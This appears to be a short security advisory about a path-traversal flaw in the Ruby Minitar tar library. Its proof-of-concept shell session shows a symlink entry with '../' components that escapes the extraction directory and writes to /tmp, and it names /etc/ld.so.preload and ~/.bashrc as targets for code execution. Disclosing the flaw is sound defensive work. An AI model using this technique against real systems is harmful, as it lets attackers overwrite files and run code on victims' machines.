Minitar and archive-tar-minitar module allows to overwrite or create arbitrary files via relative filenames and executing malicious code, e.g. by writing to /etc/ld.so.preload, ~/.bashrc.
Proof of Concept
~/current/tar_symlink $ tar -tvf symlink-overwrite.tar
lrwxrwxrwx 0 0 0 0 Jan 1 1970 ../../../../../../../../../../../../../../tmp/qwerty→
# Actual behaviour:
~/current/tar_symlink $ rm -rf /tmp/qwerty1234
~/current/tar_symlink $ minitar extract symlink-overwrite.tar
~/current/tar_symlink $ ls -al /tmp/qwerty1234
-rwxrwxrwx 1 anon wheel 0 Jan 12 22:44 /tmp/qwerty1234
# Desired behaviour:
~/current/tar_symlink $ tar -xf symlink-overwrite.tar
../../../../../../../../../../../../../../tmp/qwerty1234: Path contains '..'
tar: Error exit delayed from previous errors.